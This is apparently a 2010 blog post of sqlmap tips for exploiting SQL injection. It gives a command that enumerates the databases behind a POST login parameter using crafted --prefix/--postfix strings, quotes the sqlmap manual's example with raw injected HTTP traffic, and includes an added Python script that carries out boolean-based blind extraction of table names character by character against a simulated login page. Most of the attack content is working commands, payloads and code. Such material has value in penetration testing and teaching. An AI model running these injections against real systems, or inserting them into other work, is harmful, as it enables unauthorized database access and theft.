sqlmap speeds up a SQL injection attack considerably. It is especially useful when you need to figure out the database name, table names and so on: in blind mode it recovers a name one character at a time, comparing each character's ASCII code against a guess through a series of true/false requests, which would take a very large number of requests by hand. It also provides many other useful options, such as an interactive SQL shell.

However, it is hard to get it working the first time, so here are some useful examples.

Example: enumerate all the databases on "blah.com", where login.php has a SQL injection vulnerability in the POSTed username parameter.

./sqlmap.py --data="username=a" -u http://blah.com/login.php --method=POST -p username --prefix="blah' or not (1" --postfix=") or username='blah" --dbs
Note that --prefix and --postfix are the crucial options in most cases. This part has to be figured out by the user, since sqlmap cannot find the vulnerable strings in most cases. (This is from my experience.) Once you get the right prefix and postfix, sqlmap becomes a very powerful tool. With the pair above, whatever boolean payload sqlmap injects lands in the WHERE clause as username='blah' or not (1 <payload>) or username='blah', so the query stays syntactically valid and the payload alone decides whether a row comes back. (Later sqlmap releases renamed --postfix to --suffix; --prefix is unchanged.)

The following is the explanation of the prefix and postfix options from the sqlmap manual (http://sqlmap.sourceforge.net/doc/README.html).

Options: --prefix and --postfix

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_str_brackets.php?id=1" -v 3 \
-p "id" --prefix "'" --postfix "AND 'test'='test"

[...]
[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.121:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:17] [INFO] GET parameter 'id' is custom injectable
[...]

In some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come in handy presents itself when the user already knows the query syntax and wants to detect and exploit the SQL injection by directly providing an injection payload prefix and/or postfix.

Example on a MySQL 5.0.67 target on a page where the SQL query is:

$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";

As you can see, the injection payload for testing for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL decoded is:

id=1') AND 7433=7433 AND ('test'='test

and makes the query syntactically correct with respect to the page query:

SELECT * FROM users WHERE id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1

In this simple example, sqlmap could detect the SQL injection and exploit it without needing a custom injection payload, but in real-world applications it is sometimes necessary to provide one.
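To make the assembly concrete, here is an added Python example (written for this page; it is not code from the post or from sqlmap). It wraps a boolean payload in the blog's own --prefix/--postfix pair, runs it against a constructed in-memory SQLite stand-in for login.php (the post's target is MySQL, where sqlmap would use LENGTH/SUBSTRING/ASCII in place of SQLite's length/substr/unicode), and then performs the blind character-by-character extraction that sqlmap automates: calibrate which response means "true", binary-search the length, then binary-search each character's code. The table name it pulls from sqlite_master stands in for what --dbs or --tables enumerate. The single space between prefix and payload, the table layout and all function names are assumptions of the example.

```python
import sqlite3

# Constructed stand-in for the vulnerable site: an in-memory SQLite database
# with a users table (the post's target is MySQL; see the lead-in).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
conn.executemany("INSERT INTO users (username) VALUES (?)", [("alice",), ("bob",)])
conn.commit()

request_count = 0  # how many HTTP requests the attack would have cost

# The prefix/postfix pair from the post's sqlmap command line.
PREFIX = "blah' or not (1"
POSTFIX = ") or username='blah"


def build_param(payload: str) -> str:
    """Assemble the username parameter the way sqlmap does: prefix, then the
    boolean payload it chose, then postfix. (One separating space is assumed.)"""
    return PREFIX + " " + payload + POSTFIX


def full_query(param: str) -> str:
    """The SQL that the simulated login.php ends up executing."""
    return "SELECT * FROM users WHERE username='" + param + "'"


def login_php(param: str) -> bool:
    """Simulated login.php: concatenates the parameter into the query (the bug)
    and returns whether any row matched, which is all a blind oracle observes."""
    global request_count
    request_count += 1
    try:
        return conn.execute(full_query(param)).fetchone() is not None
    except sqlite3.Error:
        return False  # a syntactically broken query looks like a failed login


def make_oracle():
    """Calibrate like sqlmap: send a known-true and a known-false condition and
    remember which response means "true". With this prefix, 'not (1 AND ...)'
    inverts the payload, so a true condition gives the failed-login response;
    calibration makes that irrelevant. It fails when the pair does not work."""
    true_resp = login_php(build_param("AND 1=1"))
    false_resp = login_php(build_param("AND 1=2"))
    if true_resp == false_resp:
        raise RuntimeError("prefix/postfix do not yield distinguishable responses")
    return lambda cond: login_php(build_param("AND " + cond)) == true_resp


def bisect(ask, expr: str, high: int) -> int:
    """Binary-search the integer value of expr in [0, high] via 'expr > mid'."""
    low = 0
    while low < high:
        mid = (low + high) // 2
        if ask(f"{expr} > {mid}"):
            low = mid + 1
        else:
            high = mid
    return low


def extract_string(subquery: str, max_len: int = 64) -> str:
    """Recover the string a scalar subquery returns, one character at a time,
    as sqlmap's boolean-based blind technique does: length first, then the
    code of each character. SQLite: length/substr/unicode (MySQL:
    LENGTH/SUBSTRING/ASCII)."""
    ask = make_oracle()
    length = bisect(ask, f"length(({subquery}))", max_len)
    chars = []
    for pos in range(1, length + 1):
        code = bisect(ask, f"unicode(substr(({subquery}), {pos}, 1))", 127)
        chars.append(chr(code))
    return "".join(chars)


# Stand-in for what --tables enumerates: the first table name in the schema.
FIRST_TABLE = "SELECT name FROM sqlite_master WHERE type='table' LIMIT 1"


def demo():
    """Run the attack and return (recovered name, number of requests used)."""
    global request_count
    request_count = 0
    name = extract_string(FIRST_TABLE)
    return name, request_count


if __name__ == "__main__":
    param = build_param("AND 7433=7433")
    print("parameter :", param)
    print("query     :", full_query(param))
    name, n = demo()
    print(f"table name: {name!r} recovered in {n} requests")
```

Running it prints the assembled parameter, the full query it produces, and the recovered table name together with the request count (43 for the five-character name here: two calibration requests, six for the length and seven per character). That count is what makes hand-driven blind injection so slow, and the calibration step is where a wrong prefix/postfix pair shows itself: if the two probes return the same response, nothing downstream can work.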

Good article to read: http://www.milw0rm.com/papers/202

2010/01/19 21:22
Posted by 차상길.
